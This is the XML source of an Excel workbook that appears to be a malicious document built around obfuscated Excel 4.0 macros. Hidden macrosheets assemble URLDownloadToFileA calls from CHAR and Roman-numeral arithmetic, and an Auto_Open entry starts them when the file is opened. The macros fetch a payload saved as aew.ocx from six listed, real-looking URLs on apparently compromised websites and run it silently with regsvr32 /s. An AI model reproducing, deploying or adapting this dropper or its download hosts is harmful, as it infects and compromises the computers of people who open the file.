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macrosheets/intlsheet1.xml" ContentType="application/vnd.ms-excel.intlmacrosheet+xml"/>
  <Override PartName="/xl/macrosheets/sheet1.xml" ContentType="application/vnd.ms-excel.macrosheet+xml"/>
  <Override PartName="/xl/macrosheets/sheet2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File\1mar\CIR-ZV\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{EF25AFB5-3447-4DEB-9952-1924054FD5EC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Vfrbuk1" sheetId="2" state="hidden" r:id="rId1"/>
    <sheet name="Sheet" sheetId="8" r:id="rId2"/>
    <sheet name="Lefasbor1" sheetId="3" state="hidden" r:id="rId3"/>
    <sheet name="EFALGV" sheetId="4" state="hidden" r:id="rId4"/>
    <sheet name="Je1" sheetId="5" state="hidden" r:id="rId5"/>
    <sheet name="Je2" sheetId="6" state="hidden" r:id="rId6"/>
  </sheets>
  <definedNames>
    <definedName name="DDDDD1">#REF!</definedName>
    <definedName name="DDWD">#REF!</definedName>
    <definedName name="DDWD1">#REF!</definedName>
    <definedName name="DDWD2">#REF!</definedName>
    <definedName name="DDWD3">#REF!</definedName>
    <definedName name="DDWD4">#REF!</definedName>
    <definedName name="GFGH1">EFALGV!$D$10</definedName>
    <definedName name="GFGH2">EFALGV!$D$12</definedName>
    <definedName name="GFGH3">EFALGV!$D$14</definedName>
    <definedName name="GFGH4">EFALGV!$D$16</definedName>
    <definedName name="GFGH5">EFALGV!$D$18</definedName>
    <definedName name="GFGH6">EFALGV!$D$20</definedName>
    <definedName name="KKLD8">#REF!</definedName>
    <definedName name="PC">Sheet!$V$19</definedName>
    <definedName name="_xlnm.Auto_Open">EFALGV!$D$1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3" l="1"/>
  <c r="M7" i="3"/>
  <c r="R10" i="3"/>
  <c r="N3" i="3"/>
  <c r="K37" i="2"/>
  <c r="Q36" i="2"/>
  <c r="E35" i="2"/>
  <c r="O33" i="2"/>
  <c r="I32" i="2"/>
  <c r="I26" i="2"/>
  <c r="G24" i="2"/>
  <c r="K23" i="2"/>
  <c r="P22" i="2"/>
  <c r="P20" i="2"/>
  <c r="P19" i="2"/>
  <c r="B18" i="2"/>
  <c r="P17" i="2"/>
  <c r="I17" i="2"/>
  <c r="D17" i="2"/>
  <c r="P15" i="2"/>
  <c r="F15" i="2"/>
  <c r="B15" i="2"/>
  <c r="K14" i="2"/>
  <c r="G14" i="2"/>
  <c r="P13" i="2"/>
  <c r="H13" i="2"/>
  <c r="D13" i="2"/>
  <c r="A12" i="2"/>
  <c r="B8" i="3"/>
  <c r="P11" i="2"/>
  <c r="E4" i="3"/>
  <c r="L11" i="2"/>
  <c r="J11" i="2"/>
  <c r="E11" i="2"/>
  <c r="F10" i="2"/>
  <c r="P9" i="2"/>
  <c r="K9" i="2"/>
  <c r="H9" i="2"/>
  <c r="C9" i="2"/>
  <c r="P7" i="2"/>
  <c r="K2" i="3"/>
  <c r="M7" i="2"/>
  <c r="D7" i="2"/>
  <c r="J6" i="2"/>
  <c r="E6" i="2"/>
  <c r="P5" i="2"/>
  <c r="B5" i="2"/>
  <c r="N4" i="2"/>
  <c r="H4" i="2"/>
  <c r="F4" i="2"/>
  <c r="P3" i="2"/>
  <c r="I3" i="2"/>
  <c r="C3" i="2"/>
  <c r="L2" i="2"/>
  <c r="G9" i="3"/>
  <c r="G2" i="2"/>
  <c r="E2" i="2"/>
  <c r="D12" i="3"/>
  <c r="P5" i="3"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="12" uniqueCount="12">
  <si>
    <t>G</t>
  </si>
  <si>
    <t>!</t>
  </si>
  <si>
    <t>/</t>
  </si>
  <si>
    <t>SysWow64\</t>
  </si>
  <si>
    <t>\Windows\</t>
  </si>
  <si>
    <t>regsvr32.exe</t>
  </si>
  <si>
    <t>"http://diacrestgroup.com/ggv3rjy/9/","</t>
  </si>
  <si>
    <t>"https://merturku.com/blogs/IFcif/","</t>
  </si>
  <si>
    <t>"https://tugbagoncaguzellik.com/odwxblu/hRhyIiTr7M8/","</t>
  </si>
  <si>
    <t>"https://winnieswondersaviary.com/wp-content/GfGvSMj6HihGNZZa9T/","</t>
  </si>
  <si>
    <t>"https://mayatherm.com/vendor/3Vk/","</t>
  </si>
  <si>
    <t>"https://dbmtechnologies.ca/wp-content/oZE7jRqRoPg7zVVW9/","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</si>
</sst>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D4D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8D4D4"/>
      <color rgb="FFFCF7B6"/>
      <color rgb="FFF9FECA"/>
      <color rgb="FFF8FEBE"/>
      <color rgb="FFF1FE72"/>
      <color rgb="FFF4FE9A"/>
      <color rgb="FFF4F6A2"/>
      <color rgb="FFEAEBAD"/>
      <color rgb="FFF0F2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xlMacrosheet" Target="macrosheets/sheet2.xml"/><Relationship Id="rId5" Type="http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet" Target="macrosheets/sheet1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/calcChain" Target="calcChain.xml"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2006/relationships/xlIntlMacrosheet" Target="macrosheets/intlsheet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15</xdr:col>
      <xdr:colOff>276225</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>9677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CD086B8-4082-4103-A664-EB91CA3C5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9420224" cy="247801"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/macrosheets/intl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300-000000000000}">
  <dimension ref="D7"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="3" width="8.7109375" style="1"/>
    <col min="4" max="4" width="8.7109375" style="1" hidden="1" customWidth="1"/>
    <col min="5" max="16384" width="8.7109375" style="1"/>
  </cols>
  <sheetData>
    <row r="7" spans="4:4" x14ac:dyDescent="0.25">
      <c r="D7" s="1" t="b">
        <f>FORMULA('Je1'!D17,'Je2'!E6)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!H9&amp;Vfrbuk1!L2&amp;Vfrbuk1!B15&amp;Vfrbuk1!B15&amp;Lefasbor1!E4&amp;Lefasbor1!B8&amp;Lefasbor1!D12&amp;'Je2'!E6&amp;Lefasbor1!G9&amp;Lefasbor1!K2&amp;Lefasbor1!G18&amp;Lefasbor1!R10&amp;Lefasbor1!P5,D10)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!J11&amp;Vfrbuk1!B18&amp;Vfrbuk1!P11&amp;"GFGH1"&amp;Lefasbor1!M7&amp;Vfrbuk1!H9&amp;Vfrbuk1!L2&amp;Vfrbuk1!B15&amp;Vfrbuk1!B15&amp;Lefasbor1!E4&amp;Lefasbor1!B8&amp;Lefasbor1!D12&amp;'Je2'!E6&amp;Lefasbor1!G9&amp;Lefasbor1!K2&amp;Lefasbor1!G20&amp;Lefasbor1!R10&amp;Lefasbor1!P5&amp;Vfrbuk1!P13,D12)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!J11&amp;Vfrbuk1!B18&amp;Vfrbuk1!P11&amp;"GFGH2"&amp;Lefasbor1!M7&amp;Vfrbuk1!H9&amp;Vfrbuk1!L2&amp;Vfrbuk1!B15&amp;Vfrbuk1!B15&amp;Lefasbor1!E4&amp;Lefasbor1!B8&amp;Lefasbor1!D12&amp;'Je2'!E6&amp;Lefasbor1!G9&amp;Lefasbor1!K2&amp;Lefasbor1!G22&amp;Lefasbor1!R10&amp;Lefasbor1!P5&amp;Vfrbuk1!P13,D14)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!J11&amp;Vfrbuk1!B18&amp;Vfrbuk1!P11&amp;"GFGH3"&amp;Lefasbor1!M7&amp;Vfrbuk1!H9&amp;Vfrbuk1!L2&amp;Vfrbuk1!B15&amp;Vfrbuk1!B15&amp;Lefasbor1!E4&amp;Lefasbor1!B8&amp;Lefasbor1!D12&amp;'Je2'!E6&amp;Lefasbor1!G9&amp;Lefasbor1!K2&amp;Lefasbor1!G24&amp;Lefasbor1!R10&amp;Lefasbor1!P5&amp;Vfrbuk1!P13,D16)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!J11&amp;Vfrbuk1!B18&amp;Vfrbuk1!P11&amp;"GFGH4"&amp;Lefasbor1!M7&amp;Vfrbuk1!H9&amp;Vfrbuk1!L2&amp;Vfrbuk1!B15&amp;Vfrbuk1!B15&amp;Lefasbor1!E4&amp;Lefasbor1!B8&amp;Lefasbor1!D12&amp;'Je2'!E6&amp;Lefasbor1!G9&amp;Lefasbor1!K2&amp;Lefasbor1!I18&amp;Lefasbor1!R10&amp;Lefasbor1!P5&amp;Vfrbuk1!P13,D18)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!J11&amp;Vfrbuk1!B18&amp;Vfrbuk1!P11&amp;"GFGH5"&amp;Lefasbor1!M7&amp;Vfrbuk1!H9&amp;Vfrbuk1!L2&amp;Vfrbuk1!B15&amp;Vfrbuk1!B15&amp;Lefasbor1!E4&amp;Lefasbor1!B8&amp;Lefasbor1!D12&amp;'Je2'!E6&amp;Lefasbor1!G9&amp;Lefasbor1!K2&amp;Lefasbor1!I20&amp;Lefasbor1!R10&amp;Lefasbor1!P5&amp;Vfrbuk1!P13,D20)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!J11&amp;Vfrbuk1!B18&amp;Vfrbuk1!P11&amp;"GFGH6"&amp;Lefasbor1!M7&amp;Vfrbuk1!H9&amp;Vfrbuk1!B15&amp;Vfrbuk1!I17&amp;Vfrbuk1!I3&amp;Vfrbuk1!H13&amp;Vfrbuk1!P11&amp;Vfrbuk1!K9&amp;Vfrbuk1!P13&amp;Vfrbuk1!P7&amp;Vfrbuk1!P13,D22)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!H13&amp;Vfrbuk1!N4&amp;Vfrbuk1!H13&amp;Vfrbuk1!H9&amp;Vfrbuk1!P11&amp;Vfrbuk1!P15&amp;Vfrbuk1!H9&amp;Vfrbuk1!P20&amp;Lefasbor1!T3&amp;Lefasbor1!Q14&amp;Lefasbor1!N13&amp;Lefasbor1!J14&amp;Lefasbor1!N3&amp;Vfrbuk1!P15&amp;Vfrbuk1!P13,D24)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!G24&amp;Vfrbuk1!H13&amp;Vfrbuk1!E6&amp;Vfrbuk1!E11&amp;Vfrbuk1!F4&amp;Vfrbuk1!K23&amp;Vfrbuk1!P11&amp;Vfrbuk1!P13,D33)</f>
        <v>1</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macrosheet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400-000000000000}">
  <dimension ref="D17"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="16384" width="9.140625" style="1"/>
  </cols>
  <sheetData>
    <row r="17" spans="4:4" x14ac:dyDescent="0.25">
      <c r="D17" s="1" t="str">
        <f>CHAR(Vfrbuk1!K37)</f>
        <v>e</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/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500-000000000000}">
  <dimension ref="A1"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="16384" width="9.140625" style="1"/>
  </cols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37"/>
  <sheetViews>
    <sheetView workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="16384" width="9.140625" style="1"/>
  </cols>
  <sheetData>
    <row r="2" spans="1:16" x14ac:dyDescent="0.25">
      <c r="E2" s="1" t="str">
        <f>CHAR(113-2)</f>
        <v>o</v>
      </c>
      <c r="G2" s="1" t="str">
        <f>CHAR(111-6)</f>
        <v>i</v>
      </c>
      <c r="L2" s="1" t="str">
        <f>CHAR(71-6)</f>
        <v>A</v>
      </c>
    </row>
    <row r="3" spans="1:16" x14ac:dyDescent="0.25">
      <c r="C3" s="1" t="str">
        <f>CHAR(111+3)</f>
        <v>r</v>
      </c>
      <c r="I3" s="1" t="str">
        <f>CHAR(87-4)</f>
        <v>S</v>
      </c>
      <c r="P3" s="1" t="str">
        <f>CHAR(90+2)</f>
        <v>\</v>
      </c>
    </row>
    <row r="4" spans="1:16" x14ac:dyDescent="0.25">
      <c r="F4" s="1" t="str">
        <f>CHAR(100-18)</f>
        <v>R</v>
      </c>
      <c r="H4" s="1" t="str">
        <f>CHAR(110-9)</f>
        <v>e</v>
      </c>
      <c r="K4" s="1">
        <v>1</v>
      </c>
      <c r="N4" s="1" t="str">
        <f>CHAR(89-1)</f>
        <v>X</v>
      </c>
    </row>
    <row r="5" spans="1:16" x14ac:dyDescent="0.25">
      <c r="B5" s="1" t="str">
        <f>CHAR(115+2)</f>
        <v>u</v>
      </c>
      <c r="P5" s="1" t="str">
        <f>CHAR(44+2)</f>
        <v>.</v>
      </c>
    </row>
    <row r="6" spans="1:16" x14ac:dyDescent="0.25">
      <c r="E6" s="1" t="str">
        <f>CHAR(90-6)</f>
        <v>T</v>
      </c>
      <c r="J6" s="1" t="str">
        <f>CHAR(77-3)</f>
        <v>J</v>
      </c>
    </row>
    <row r="7" spans="1:16" x14ac:dyDescent="0.25">
      <c r="D7" s="1" t="str">
        <f>CHAR(107+3)</f>
        <v>n</v>
      </c>
      <c r="F7" s="1">
        <v>3</v>
      </c>
      <c r="M7" s="1" t="str">
        <f>CHAR(117-2)</f>
        <v>s</v>
      </c>
      <c r="P7" s="1" t="str">
        <f>CHAR(41+3)</f>
        <v>,</v>
      </c>
    </row>
    <row r="9" spans="1:16" x14ac:dyDescent="0.25">
      <c r="C9" s="1" t="str">
        <f>CHAR(110-2)</f>
        <v>l</v>
      </c>
      <c r="H9" s="1" t="str">
        <f>CHAR(70-3)</f>
        <v>C</v>
      </c>
      <c r="K9" s="1" t="str">
        <f>CHAR(55-7)</f>
        <v>0</v>
      </c>
      <c r="P9" s="1" t="str">
        <f>CHAR(55+5)</f>
        <v>&lt;</v>
      </c>
    </row>
    <row r="10" spans="1:16" x14ac:dyDescent="0.25">
      <c r="F10" s="1" t="str">
        <f>CHAR(123-4)</f>
        <v>w</v>
      </c>
    </row>
    <row r="11" spans="1:16" x14ac:dyDescent="0.25">
      <c r="E11" s="1" t="str">
        <f>CHAR(80+5)</f>
        <v>U</v>
      </c>
      <c r="J11" s="1" t="str">
        <f>CHAR(80-7)</f>
        <v>I</v>
      </c>
      <c r="L11" s="1" t="str">
        <f>CHAR(100-1)</f>
        <v>c</v>
      </c>
      <c r="P11" s="1" t="str">
        <f>CHAR(35+5)</f>
        <v>(</v>
      </c>
    </row>
    <row r="12" spans="1:16" x14ac:dyDescent="0.25">
      <c r="A12" s="1" t="str">
        <f>CHAR(107+2)</f>
        <v>m</v>
      </c>
    </row>
    <row r="13" spans="1:16" x14ac:dyDescent="0.25">
      <c r="D13" s="1" t="str">
        <f>CHAR(72-4)</f>
        <v>D</v>
      </c>
      <c r="H13" s="1" t="str">
        <f>CHAR(68+1)</f>
        <v>E</v>
      </c>
      <c r="N13" s="1">
        <v>2</v>
      </c>
      <c r="P13" s="1" t="str">
        <f>CHAR(36+5)</f>
        <v>)</v>
      </c>
    </row>
    <row r="14" spans="1:16" x14ac:dyDescent="0.25">
      <c r="G14" s="1" t="str">
        <f>CHAR(124-4)</f>
        <v>x</v>
      </c>
      <c r="K14" s="1" t="str">
        <f>CHAR(70-4)</f>
        <v>B</v>
      </c>
    </row>
    <row r="15" spans="1:16" x14ac:dyDescent="0.25">
      <c r="B15" s="1" t="str">
        <f>CHAR(80-4)</f>
        <v>L</v>
      </c>
      <c r="F15" s="1" t="str">
        <f>CHAR(105-5)</f>
        <v>d</v>
      </c>
      <c r="P15" s="1" t="str">
        <f>CHAR(31+3)</f>
        <v>"</v>
      </c>
    </row>
    <row r="17" spans="2:16" x14ac:dyDescent="0.25">
      <c r="D17" s="1" t="str">
        <f>CHAR(102-5)</f>
        <v>a</v>
      </c>
      <c r="I17" s="1" t="str">
        <f>CHAR(78+1)</f>
        <v>O</v>
      </c>
      <c r="K17" s="1" t="s">
        <v>0</v>
      </c>
      <c r="P17" s="1" t="str">
        <f>CHAR(40-2)</f>
        <v>&amp;</v>
      </c>
    </row>
    <row r="18" spans="2:16" x14ac:dyDescent="0.25">
      <c r="B18" s="1" t="str">
        <f>CHAR(65+5)</f>
        <v>F</v>
      </c>
    </row>
    <row r="19" spans="2:16" x14ac:dyDescent="0.25">
      <c r="P19" s="1" t="str">
        <f>CHAR(32)</f>
        <v xml:space="preserve"> </v>
      </c>
    </row>
    <row r="20" spans="2:16" x14ac:dyDescent="0.25">
      <c r="H20" s="1">
        <v>8</v>
      </c>
      <c r="P20" s="1" t="str">
        <f>CHAR(52+6)</f>
        <v>:</v>
      </c>
    </row>
    <row r="22" spans="2:16" x14ac:dyDescent="0.25">
      <c r="P22" s="1" t="str">
        <f>CHAR(66-5)</f>
        <v>=</v>
      </c>
    </row>
    <row r="23" spans="2:16" x14ac:dyDescent="0.25">
      <c r="K23" s="1" t="str">
        <f>CHAR(80-2)</f>
        <v>N</v>
      </c>
    </row>
    <row r="24" spans="2:16" x14ac:dyDescent="0.25">
      <c r="G24" s="1" t="str">
        <f>CHAR(84-2)</f>
        <v>R</v>
      </c>
      <c r="P24" s="1" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="26" spans="2:16" x14ac:dyDescent="0.25">
      <c r="I26" s="1" t="str">
        <f>CHAR(84)</f>
        <v>T</v>
      </c>
    </row>
    <row r="27" spans="2:16" x14ac:dyDescent="0.25">
      <c r="P27" s="1" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="32" spans="2:16" x14ac:dyDescent="0.25">
      <c r="I32" s="1">
        <f>_xlfn.ARABIC("CXI")</f>
        <v>111</v>
      </c>
    </row>
    <row r="33" spans="5:17" x14ac:dyDescent="0.25">
      <c r="O33" s="1">
        <f>_xlfn.ARABIC("LXVII")</f>
        <v>67</v>
      </c>
    </row>
    <row r="35" spans="5:17" x14ac:dyDescent="0.25">
      <c r="E35" s="1">
        <f>_xlfn.ARABIC("LXI")</f>
        <v>61</v>
      </c>
    </row>
    <row r="36" spans="5:17" x14ac:dyDescent="0.25">
      <c r="Q36" s="1">
        <f>_xlfn.ARABIC("CXIV")</f>
        <v>114</v>
      </c>
    </row>
    <row r="37" spans="5:17" x14ac:dyDescent="0.25">
      <c r="K37" s="1">
        <f>_xlfn.ARABIC("CI")</f>
        <v>101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0F04A-B29E-458A-AD72-1189950CD0E2}">
  <dimension ref="A1"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="AE21" sqref="AE21"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" customHeight="1" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="1" s="2" customFormat="1" ht="18.75" customHeigh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24"/>
  <sheetViews>
    <sheetView workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="16384" width="9.140625" style="1"/>
  </cols>
  <sheetData>
    <row r="2" spans="2:20" x14ac:dyDescent="0.25">
      <c r="K2" s="1" t="str">
        <f>Vfrbuk1!P7&amp;Vfrbuk1!K9&amp;Vfrbuk1!P7</f>
        <v>,0,</v>
      </c>
    </row>
    <row r="3" spans="2:20" x14ac:dyDescent="0.25">
      <c r="N3" s="1" t="str">
        <f>T(Vfrbuk1!P19&amp;Vfrbuk1!P5&amp;Vfrbuk1!P5&amp;Vfrbuk1!P3&amp;Vfrbuk1!D17&amp;Vfrbuk1!H4&amp;Vfrbuk1!F10&amp;Vfrbuk1!P5&amp;Vfrbuk1!E2&amp;Vfrbuk1!L11&amp;Vfrbuk1!G14)</f>
        <v xml:space="preserve"> ..\aew.ocx</v>
      </c>
      <c r="T3" s="1" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="4" spans="2:20" x14ac:dyDescent="0.25">
      <c r="E4" s="1" t="str">
        <f>T(Vfrbuk1!P11&amp;Vfrbuk1!P15&amp;Vfrbuk1!B5&amp;Vfrbuk1!C3&amp;Vfrbuk1!C9)</f>
        <v>("url</v>
      </c>
    </row>
    <row r="5" spans="2:20" x14ac:dyDescent="0.25">
      <c r="P5" s="1" t="str">
        <f>T(Vfrbuk1!P7&amp;Vfrbuk1!K9&amp;Vfrbuk1!P7&amp;Vfrbuk1!K9&amp;Vfrbuk1!P13)</f>
        <v>,0,0)</v>
      </c>
    </row>
    <row r="7" spans="2:20" x14ac:dyDescent="0.25">
      <c r="M7" s="1" t="str">
        <f>T(Vfrbuk1!P9&amp;Vfrbuk1!K9&amp;Vfrbuk1!P7&amp;Vfrbuk1!P19)</f>
        <v xml:space="preserve">&lt;0, </v>
      </c>
    </row>
    <row r="8" spans="2:20" x14ac:dyDescent="0.25">
      <c r="B8" s="1" t="str">
        <f>T(Vfrbuk1!A12&amp;Vfrbuk1!E2&amp;Vfrbuk1!D7&amp;Vfrbuk1!P15&amp;Vfrbuk1!P7&amp;Vfrbuk1!P15&amp;Vfrbuk1!E11&amp;Vfrbuk1!F4&amp;Vfrbuk1!B15&amp;Vfrbuk1!D13)</f>
        <v>mon","URLD</v>
      </c>
    </row>
    <row r="9" spans="2:20" x14ac:dyDescent="0.25">
      <c r="G9" s="1" t="str">
        <f>T(Vfrbuk1!L2&amp;Vfrbuk1!P15&amp;Vfrbuk1!P7&amp;Vfrbuk1!P15&amp;Vfrbuk1!J6&amp;Vfrbuk1!J6&amp;Vfrbuk1!H9&amp;Vfrbuk1!H9&amp;Vfrbuk1!K14&amp;Vfrbuk1!K14&amp;Vfrbuk1!P15)</f>
        <v>A","JJCCBB"</v>
      </c>
    </row>
    <row r="10" spans="2:20" x14ac:dyDescent="0.25">
      <c r="R10" s="1" t="str">
        <f>T(Vfrbuk1!P5&amp;Vfrbuk1!P5&amp;Vfrbuk1!P3&amp;Vfrbuk1!D17&amp;Vfrbuk1!H4&amp;Vfrbuk1!F10&amp;Vfrbuk1!P5&amp;Vfrbuk1!E2&amp;Vfrbuk1!L11&amp;Vfrbuk1!G14&amp;Vfrbuk1!P15)</f>
        <v>..\aew.ocx"</v>
      </c>
    </row>
    <row r="12" spans="2:20" x14ac:dyDescent="0.25">
      <c r="D12" s="1" t="str">
        <f>T(Vfrbuk1!E2&amp;Vfrbuk1!F10&amp;Vfrbuk1!D7&amp;Vfrbuk1!C9&amp;Vfrbuk1!E2&amp;Vfrbuk1!D17&amp;Vfrbuk1!F15&amp;Vfrbuk1!E6&amp;Vfrbuk1!E2&amp;Vfrbuk1!B18&amp;Vfrbuk1!G2&amp;Vfrbuk1!C9)</f>
        <v>ownloadToFil</v>
      </c>
    </row>
    <row r="13" spans="2:20" x14ac:dyDescent="0.25">
      <c r="N13" s="1" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="14" spans="2:20" x14ac:dyDescent="0.25">
      <c r="J14" s="1" t="str">
        <f>T(Vfrbuk1!P19&amp;Vfrbuk1!P27&amp;Vfrbuk1!M7)</f>
        <v xml:space="preserve"> /s</v>
      </c>
      <c r="Q14" s="1" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="18" spans="7:9" x14ac:dyDescent="0.25">
      <c r="G18" s="1" t="s">
        <v>6</v>
      </c>
      <c r="I18" s="1" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="20" spans="7:9" x14ac:dyDescent="0.25">
      <c r="G20" s="1" t="s">
        <v>7</v>
      </c>
      <c r="I20" s="1" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="22" spans="7:9" x14ac:dyDescent="0.25">
      <c r="G22" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="24" spans="7:9" x14ac:dyDescent="0.25">
      <c r="G24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3</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Макросы Excel 4.0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Vfrbuk1</vt:lpstr>
      <vt:lpstr>Sheet</vt:lpstr>
      <vt:lpstr>Lefasbor1</vt:lpstr>
      <vt:lpstr>EFALGV</vt:lpstr>
      <vt:lpstr>Je1</vt:lpstr>
      <vt:lpstr>Je2</vt:lpstr>
      <vt:lpstr>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2022-03-01T14:10:34Z</dcterms:modified>
</cp:coreProperties>
</file>